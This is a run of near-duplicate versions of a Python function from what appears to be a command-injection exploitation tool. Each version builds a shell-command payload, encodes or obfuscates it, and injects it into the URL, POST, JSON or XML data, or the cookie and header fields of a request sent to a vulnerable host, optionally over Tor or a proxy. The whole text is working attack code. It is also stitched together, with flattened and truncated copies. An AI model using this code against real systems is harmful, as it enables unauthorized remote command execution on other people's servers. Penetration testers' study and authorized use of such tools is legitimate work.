def injection(separator, TAG, cmd, prefix, suffix, http_request_method, url, vuln_parameter): # Execute shell commands on vulnerable host. payload = eb_payloads.cmd_execution(separator, TAG, cmd) payload = re.sub(" ", "%20", payload) # Fix prefixes / suffixes payload = parameters.prefixes(payload, prefix) payload = parameters.suffixes(payload, suffix) # Check if defined "--verbose" option. if menu.options.verbose: sys.stdout.write("\n" + Fore.GREY + "(~) Payload: " + payload + Style.RESET_ALL) # Check if defined cookie with "INJECT_HERE" tag if menu.options.cookie and settings.INJECT_TAG in menu.options.cookie: response = cookie_injection_test(url, vuln_parameter, payload) # Check if defined user-agent with "INJECT_HERE" tag elif menu.options.agent and settings.INJECT_TAG in menu.options.agent: response = user_agent_injection_test(url, vuln_parameter, payload) # Check if defined referer with "INJECT_HERE" tag elif menu.options.referer and settings.INJECT_TAG in menu.options.referer: response = referer_injection_test(url, vuln_parameter, payload) else: # Check if defined method is GET (Default). if http_request_method == "GET": # Check if its not specified the 'INJECT_HERE' tag url = parameters.do_GET_check(url) target = re.sub(settings.INJECT_TAG, payload, url) vuln_parameter = ''.join(vuln_parameter) request = urllib2.Request(target) # Check if defined extra headers. headers.do_check(request) # Check if defined any HTTP Proxy. if menu.options.proxy: try: response = proxy.use_proxy(request) except urllib2.HTTPError, err: print "\n" + Back.RED + "(x) Error: " + str( err) + Style.RESET_ALL raise SystemExit() # Check if defined Tor. elif menu.options.tor: try: response = tor.use_tor(request) except urllib2.HTTPError, err: print "\n" + Back.RED + "(x) Error: " + str( err) + Style.RESET_ALL raise SystemExit() else:
def injection(separator, TAG, cmd, prefix, suffix, http_request_method, url, vuln_parameter): # Execute shell commands on vulnerable host. payload = eb_payloads.cmd_execution(separator, TAG, cmd) payload = re.sub(" ", "%20", payload) # Fix prefixes / suffixes payload = parameters.prefixes(payload, prefix) payload = parameters.suffixes(payload, suffix) # Check if defined "--verbose" option. if menu.options.verbose: sys.stdout.write("\n" + Fore.GREY + payload + Style.RESET_ALL) # Check if defined cookie with "INJECT_HERE" tag if menu.options.cookie and settings.INJECT_TAG in menu.options.cookie: response = cookie_injection_test(url, vuln_parameter, payload) # Check if defined user-agent with "INJECT_HERE" tag elif menu.options.agent and settings.INJECT_TAG in menu.options.agent: response = user_agent_injection_test(url, vuln_parameter, payload) # Check if defined referer with "INJECT_HERE" tag elif menu.options.referer and settings.INJECT_TAG in menu.options.referer: response = referer_injection_test(url, vuln_parameter, payload) else: # Check if defined method is GET (Default). if http_request_method == "GET": # Check if its not specified the 'INJECT_HERE' tag url = parameters.do_GET_check(url) target = re.sub(settings.INJECT_TAG, payload, url) vuln_parameter = ''.join(vuln_parameter) request = urllib2.Request(target) # Check if defined extra headers. headers.do_check(request) # Check if defined any HTTP Proxy. if menu.options.proxy: try: response = proxy.use_proxy(request) except urllib2.HTTPError, err: print "\n" + Back.RED + "(x) Error: " + str(err) + Style.RESET_ALL raise SystemExit() # Check if defined Tor. elif menu.options.tor: try: response = tor.use_tor(request) except urllib2.HTTPError, err: print "\n" + Back.RED + "(x) Error: " + str(err) + Style.RESET_ALL raise SystemExit() else:
def injection(separator, TAG, cmd, prefix, suffix, http_request_method, url,
              vuln_parameter):
    """Build the payload for `cmd` and send it in a GET request.

    The payload comes from eb_payloads.cmd_execution(); its spaces are
    replaced with "%20" and the prefix/suffix are attached (a "--prefix" or
    "--suffix" option overrides the argument) before it is substituted for
    settings.INJECT_TAG in the URL.

    NOTE(review): only the GET path is visible in this listing and nothing is
    returned; the listing may be truncated.
    """
    payload = re.sub(" ", "%20", eb_payloads.cmd_execution(separator, TAG, cmd))

    # Command-line "--prefix" / "--suffix" values win over the arguments.
    if menu.options.prefix:
        prefix = menu.options.prefix
    if menu.options.suffix:
        suffix = menu.options.suffix
    payload = prefix + payload + suffix

    # "--verbose": echo the final payload to stdout.
    if menu.options.verbose:
        sys.stdout.write("\n" + colors.GREY + payload + colors.RESET)

    # GET is the default request method.
    if http_request_method == "GET":
        # Original comment: "Check if its not specified the 'INJECT_HERE' tag".
        url = parameters.do_GET_check(url)
        # NOTE(review): re.sub() reads the tag as a regex and the payload as a
        # replacement template, so backslash sequences in it are interpreted.
        target = re.sub(settings.INJECT_TAG, payload, url)
        vuln_parameter = ''.join(vuln_parameter)
        request = urllib2.Request(target)
        # Apply any extra headers.
        headers.do_check(request)

        try:
            if menu.options.proxy:
                # install_opener() replaces the process-wide default opener,
                # so later urlopen() calls use this proxy as well.
                proxy_handler = urllib2.ProxyHandler({'http': menu.options.proxy})
                urllib2.install_opener(urllib2.build_opener(proxy_handler))
            response = urllib2.urlopen(request)
        # Only HTTPError is handled; other urlopen() failures propagate.
        # The `as` form and parenthesised print also run on Python 2.6+.
        except urllib2.HTTPError as err:
            print("\n" + colors.BGRED + "(x) Error : " + str(err) + colors.RESET)
            sys.exit(1)
def injection(separator, TAG, cmd, prefix, suffix, http_request_method, url,
              vuln_parameter):
    """Build the payload for `cmd` and send it in a GET request.

    The request goes through proxy.use_proxy() or tor.use_tor(), depending on
    which option is set.

    NOTE(review): in the visible code no request is sent when neither option
    is set, there is no POST path and nothing is returned; the listing looks
    truncated.
    """
    payload = re.sub(" ", "%20", eb_payloads.cmd_execution(separator, TAG, cmd))

    # Command-line "--prefix" / "--suffix" values win over the arguments.
    if menu.options.prefix:
        prefix = menu.options.prefix
    if menu.options.suffix:
        suffix = menu.options.suffix
    payload = prefix + payload + suffix

    # "--verbose": echo the final payload to stdout.
    if menu.options.verbose:
        sys.stdout.write("\n" + Fore.GREY + payload + Style.RESET_ALL)

    # GET is the default request method.
    if http_request_method == "GET":
        # Original comment: "Check if its not specified the 'INJECT_HERE' tag".
        url = parameters.do_GET_check(url)
        target = re.sub(settings.INJECT_TAG, payload, url)
        vuln_parameter = ''.join(vuln_parameter)
        request = urllib2.Request(target)
        # Apply any extra headers.
        headers.do_check(request)

        # Pick the transport: an HTTP proxy takes precedence over Tor.
        if menu.options.proxy:
            send = proxy.use_proxy
        elif menu.options.tor:
            send = tor.use_tor
        else:
            send = None

        if send is not None:
            try:
                response = send(request)
            # Only HTTPError is handled; other failures propagate.
            except urllib2.HTTPError as err:
                print("\n" + Back.RED + "(x) Error : " + str(err) + Style.RESET_ALL)
                raise SystemExit()
def injection(separator, TAG, cmd, prefix, suffix, http_request_method, url,
              vuln_parameter):
    """Build the payload for `cmd` and send it in a GET request.

    The request is sent directly, or through the HTTP proxy when that option
    is set.

    NOTE(review): only the GET path is visible in this listing and nothing is
    returned; the listing may be truncated.
    """
    payload = re.sub(" ", "%20", eb_payloads.cmd_execution(separator, TAG, cmd))

    # Command-line "--prefix" / "--suffix" values win over the arguments.
    if menu.options.prefix:
        prefix = menu.options.prefix
    if menu.options.suffix:
        suffix = menu.options.suffix
    payload = prefix + payload + suffix

    # "--verbose": echo the final payload to stdout.
    if menu.options.verbose:
        sys.stdout.write("\n" + colors.GREY + payload + colors.RESET)

    # GET is the default request method.
    if http_request_method == "GET":
        # Original comment: "Check if its not specified the 'INJECT_HERE' tag".
        url = parameters.do_GET_check(url)
        target = re.sub(settings.INJECT_TAG, payload, url)
        vuln_parameter = ''.join(vuln_parameter)
        request = urllib2.Request(target)
        # Apply any extra headers.
        headers.do_check(request)

        if menu.options.proxy:
            try:
                # install_opener() replaces the process-wide default opener.
                proxy_handler = urllib2.ProxyHandler({'http': menu.options.proxy})
                urllib2.install_opener(urllib2.build_opener(proxy_handler))
                response = urllib2.urlopen(request)
            except urllib2.HTTPError as err:
                print("\n(x) Error : " + str(err))
                sys.exit(1)
        else:
            # NOTE(review): the direct path has no HTTPError handling, so an
            # error status raises out of this function.
            response = urllib2.urlopen(request)
def injection(separator, TAG, cmd, prefix, suffix, http_request_method, url,
              vuln_parameter, alter_shell, filename):
    """Build the payload for `cmd`, send it, and return the response.

    The payload replaces settings.INJECT_TAG in whichever part of the request
    carries the tag: the cookie, User-Agent or Referer option (handled by the
    matching *_injection_test helper), otherwise the GET URL or the POST data.
    `filename` is accepted but not used in this block.
    """
    # alter_shell selects the alternative payload builder.
    build = eb_payloads.cmd_execution_alter_shell if alter_shell else eb_payloads.cmd_execution
    payload = build(separator, TAG, cmd)

    # Attach the prefix and suffix.
    payload = parameters.prefixes(payload, prefix)
    payload = parameters.suffixes(payload, suffix)

    # Fix-up for one specific payload shape: drop the "%3B" that follows ")".
    quoted_tail = urllib.quote(")}")
    if ")%3B" + quoted_tail in payload:
        payload = payload.replace(")%3B" + quoted_tail, ")" + quoted_tail)

    if menu.options.base64:
        # Base64 is applied to the URL-decoded payload.
        payload = base64.b64encode(urllib.unquote(payload))
    else:
        payload = re.sub(" ", "%20", payload)

    # "--verbose": echo the final payload to stdout.
    if menu.options.verbose:
        sys.stdout.write("\n" + Fore.GREY + "(~) Payload: " + payload + Style.RESET_ALL)

    # Header-borne tags are checked first: cookie, then User-Agent, then Referer.
    if menu.options.cookie and settings.INJECT_TAG in menu.options.cookie:
        response = cookie_injection_test(url, vuln_parameter, payload)
    elif menu.options.agent and settings.INJECT_TAG in menu.options.agent:
        response = user_agent_injection_test(url, vuln_parameter, payload)
    elif menu.options.referer and settings.INJECT_TAG in menu.options.referer:
        response = referer_injection_test(url, vuln_parameter, payload)
    else:
        if http_request_method == "GET":
            # GET (default): the tag sits in the URL.
            # NOTE(review): re.sub() reads the tag as a regex and the payload
            # as a replacement template.
            target = re.sub(settings.INJECT_TAG, payload, url)
            vuln_parameter = ''.join(vuln_parameter)
            request = urllib2.Request(target)
        else:
            # POST: the tag sits in the "--data" string.
            parameter = urllib2.unquote(menu.options.data)
            parameter = parameters.do_POST_check(parameter)
            if settings.IS_JSON == False:
                data = re.sub(settings.INJECT_TAG, payload, parameter)
                request = urllib2.Request(url, data)
            else:
                # Escape double quotes so the payload stays inside a JSON
                # string, then round-trip the body through the json module.
                payload = payload.replace("\"", "\\\"")
                data = re.sub(settings.INJECT_TAG, urllib.unquote(payload), parameter)
                data = json.loads(data, strict=False)
                request = urllib2.Request(url, json.dumps(data))

        # Apply any extra headers, then send.
        headers.do_check(request)
        response = get_request_response(request)

    return response
def check_injection(separator, TAG, cmd, prefix, suffix, whitespace,
                    http_request_method, url, vuln_parameter, alter_shell,
                    filename):
    """Build the payload for `cmd`, send it, and return the response.

    The payload replaces settings.INJECT_TAG in whichever part of the request
    carries the tag: cookie, User-Agent, Referer, Host or a custom header
    (handled by the matching *_injection_test helper), otherwise the GET URL
    or the POST data. `filename` is accepted but not used in this block.
    """
    # alter_shell selects the alternative payload builder.
    build = eb_payloads.cmd_execution_alter_shell if alter_shell else eb_payloads.cmd_execution
    payload = build(separator, TAG, cmd)

    # Attach the prefix and suffix.
    payload = parameters.prefixes(payload, prefix)
    payload = parameters.suffixes(payload, suffix)

    # Fix-up for one specific payload shape: drop the "%3B" that follows ")".
    quoted_tail = _urllib.parse.quote(")}")
    if ")%3B" + quoted_tail in payload:
        payload = payload.replace(")%3B" + quoted_tail, ")" + quoted_tail)

    # Swap spaces for the chosen whitespace token, then let
    # checks.perform_payload_modification() rewrite the payload.
    payload = payload.replace(" ", whitespace)
    payload = checks.perform_payload_modification(payload)

    # Verbose output: the command being run and the exact payload sent.
    if settings.VERBOSITY_LEVEL >= 1:
        debug_msg = "Executing the '" + cmd + "' command. "
        sys.stdout.write(settings.print_debug_msg(debug_msg))
        sys.stdout.flush()
        sys.stdout.write("\n" + settings.print_payload(payload) + "\n")

    # Header-borne tags are checked first, in this fixed order.
    if menu.options.cookie and settings.INJECT_TAG in menu.options.cookie:
        response = cookie_injection_test(url, vuln_parameter, payload)
    elif menu.options.agent and settings.INJECT_TAG in menu.options.agent:
        response = user_agent_injection_test(url, vuln_parameter, payload)
    elif menu.options.referer and settings.INJECT_TAG in menu.options.referer:
        response = referer_injection_test(url, vuln_parameter, payload)
    elif menu.options.host and settings.INJECT_TAG in menu.options.host:
        response = host_injection_test(url, vuln_parameter, payload)
    elif settings.CUSTOM_HEADER_INJECTION:
        response = custom_header_injection_test(url, vuln_parameter, payload)
    else:
        if http_request_method == "GET":
            # GET (default): the tag sits in the URL.
            target = url.replace(settings.INJECT_TAG, payload)
            vuln_parameter = ''.join(vuln_parameter)
            request = _urllib.request.Request(target)
        else:
            # POST: the tag sits in the "--data" string.
            parameter = _urllib.parse.unquote(menu.options.data)
            parameter = parameters.do_POST_check(parameter)
            # Keep literal "+" characters from being read as spaces.
            parameter = ''.join(str(e) for e in parameter).replace("+", "%2B")

            if settings.IS_JSON:
                # Escape double quotes so the payload stays inside a JSON string.
                data = parameter.replace(
                    settings.INJECT_TAG,
                    _urllib.parse.unquote(payload.replace("\"", "\\\"")))
                try:
                    data = checks.json_data(data)
                except ValueError:
                    # Best effort: the body is sent as built when
                    # checks.json_data() rejects it.
                    pass
            elif settings.IS_XML:
                data = parameter.replace(settings.INJECT_TAG,
                                         _urllib.parse.unquote(payload))
            else:
                data = parameter.replace(settings.INJECT_TAG, payload)

            request = _urllib.request.Request(
                url, data.encode(settings.UNICODE_ENCODING))

        # Apply any extra headers, then send.
        headers.do_check(request)
        response = requests.get_request_response(request)

    return response
def check_injection(separator, TAG, cmd, prefix, suffix, whitespace,
                    http_request_method, url, vuln_parameter, alter_shell,
                    filename):
    """Build the payload for `cmd`, send it, and return the response.

    The payload replaces settings.INJECT_TAG in whichever part of the request
    carries the tag: cookie, User-Agent, Referer or a custom header (handled
    by the matching *_injection_test helper), otherwise the GET URL or the
    POST data. `filename` is accepted but not used in this block.
    """
    # alter_shell selects the alternative payload builder.
    build = eb_payloads.cmd_execution_alter_shell if alter_shell else eb_payloads.cmd_execution
    payload = build(separator, TAG, cmd)

    # Attach the prefix and suffix.
    payload = parameters.prefixes(payload, prefix)
    payload = parameters.suffixes(payload, suffix)

    # Fix-up for one specific payload shape: drop the "%3B" that follows ")".
    quoted_tail = urllib.quote(")}")
    if ")%3B" + quoted_tail in payload:
        payload = payload.replace(")%3B" + quoted_tail, ")" + quoted_tail)

    # Swap spaces for the chosen whitespace token.
    payload = re.sub(" ", whitespace, payload)

    # Optional base64 tamper script, imported only when enabled.
    if settings.TAMPER_SCRIPTS['base64encode']:
        from src.core.tamper import base64encode
        payload = base64encode.encode(payload)

    # Verbose output: the command being run and the exact payload sent.
    if settings.VERBOSITY_LEVEL >= 1:
        info_msg = "Executing the '" + cmd + "' command: "
        sys.stdout.write("\n" + settings.print_info_msg(info_msg))
        sys.stdout.flush()
        sys.stdout.write("\n" + settings.print_payload(payload) + "\n")

    # Header-borne tags are checked first, in this fixed order.
    if menu.options.cookie and settings.INJECT_TAG in menu.options.cookie:
        response = cookie_injection_test(url, vuln_parameter, payload)
    elif menu.options.agent and settings.INJECT_TAG in menu.options.agent:
        response = user_agent_injection_test(url, vuln_parameter, payload)
    elif menu.options.referer and settings.INJECT_TAG in menu.options.referer:
        response = referer_injection_test(url, vuln_parameter, payload)
    elif settings.CUSTOM_HEADER_INJECTION:
        response = custom_header_injection_test(url, vuln_parameter, payload)
    else:
        if http_request_method == "GET":
            # GET (default): the tag sits in the URL.
            target = re.sub(settings.INJECT_TAG, payload, url)
            vuln_parameter = ''.join(vuln_parameter)
            request = urllib2.Request(target)
        else:
            # POST: the tag sits in the "--data" string.
            parameter = urllib2.unquote(menu.options.data)
            parameter = parameters.do_POST_check(parameter)
            # Keep literal "+" characters from being read as spaces.
            parameter = parameter.replace("+","%2B")

            if settings.IS_JSON == False:
                data = re.sub(settings.INJECT_TAG, payload, parameter)
                request = urllib2.Request(url, data)
            else:
                # Escape double quotes so the payload stays inside a JSON
                # string, then round-trip the body through the json module.
                payload = payload.replace("\"", "\\\"")
                data = re.sub(settings.INJECT_TAG, urllib.unquote(payload), parameter)
                data = json.loads(data, strict=False)
                request = urllib2.Request(url, json.dumps(data))

        # Apply any extra headers, then send.
        headers.do_check(request)
        response = requests.get_request_response(request)

    return response
def check_injection(separator, TAG, cmd, prefix, suffix, whitespace,
                    http_request_method, url, vuln_parameter, alter_shell,
                    filename):
    """Build the payload for `cmd`, send it, and return the response.

    The payload replaces settings.INJECT_TAG in whichever part of the request
    carries the tag: cookie, User-Agent, Referer or a custom header (handled
    by the matching *_injection_test helper), otherwise the GET URL or the
    POST data. `filename` is accepted but not used in this block.
    """
    # alter_shell selects the alternative payload builder.
    build = eb_payloads.cmd_execution_alter_shell if alter_shell else eb_payloads.cmd_execution
    payload = build(separator, TAG, cmd)

    # Attach the prefix and suffix.
    payload = parameters.prefixes(payload, prefix)
    payload = parameters.suffixes(payload, suffix)

    # Fix-up for one specific payload shape: drop the "%3B" that follows ")".
    quoted_tail = urllib.quote(")}")
    if ")%3B" + quoted_tail in payload:
        payload = payload.replace(")%3B" + quoted_tail, ")" + quoted_tail)

    # Swap spaces for the chosen whitespace token.
    payload = re.sub(" ", whitespace, payload)

    # Optional tamper scripts, imported only when enabled; base64 takes
    # precedence over hex.
    if settings.TAMPER_SCRIPTS['base64encode']:
        from src.core.tamper import base64encode
        payload = base64encode.encode(payload)
    elif settings.TAMPER_SCRIPTS['hexencode']:
        from src.core.tamper import hexencode
        payload = hexencode.encode(payload)

    # Verbose output: the command being run and the exact payload sent.
    if settings.VERBOSITY_LEVEL >= 1:
        info_msg = "Executing the '" + cmd + "' command... "
        sys.stdout.write(settings.print_info_msg(info_msg))
        sys.stdout.flush()
        sys.stdout.write("\n" + settings.print_payload(payload))
        # Extra blank line unless the ignore_session option is set; the
        # parenthesised print behaves the same on Python 2.
        if not menu.options.ignore_session:
            print("")

    # Header-borne tags are checked first, in this fixed order.
    if menu.options.cookie and settings.INJECT_TAG in menu.options.cookie:
        response = cookie_injection_test(url, vuln_parameter, payload)
    elif menu.options.agent and settings.INJECT_TAG in menu.options.agent:
        response = user_agent_injection_test(url, vuln_parameter, payload)
    elif menu.options.referer and settings.INJECT_TAG in menu.options.referer:
        response = referer_injection_test(url, vuln_parameter, payload)
    elif settings.CUSTOM_HEADER_INJECTION:
        response = custom_header_injection_test(url, vuln_parameter, payload)
    else:
        if http_request_method == "GET":
            # GET (default): the tag sits in the URL.
            target = re.sub(settings.INJECT_TAG, payload, url)
            vuln_parameter = ''.join(vuln_parameter)
            request = urllib2.Request(target)
        else:
            # POST: the tag sits in the "--data" string.
            parameter = urllib2.unquote(menu.options.data)
            parameter = parameters.do_POST_check(parameter)
            # Keep literal "+" characters from being read as spaces.
            parameter = parameter.replace("+", "%2B")

            if settings.IS_JSON == False:
                data = re.sub(settings.INJECT_TAG, payload, parameter)
                request = urllib2.Request(url, data)
            else:
                # Escape double quotes so the payload stays inside a JSON
                # string, then round-trip the body through the json module.
                payload = payload.replace("\"", "\\\"")
                data = re.sub(settings.INJECT_TAG, urllib.unquote(payload), parameter)
                data = json.loads(data, strict=False)
                request = urllib2.Request(url, json.dumps(data))

        # Apply any extra headers, then send.
        headers.do_check(request)
        response = requests.get_request_response(request)

    return response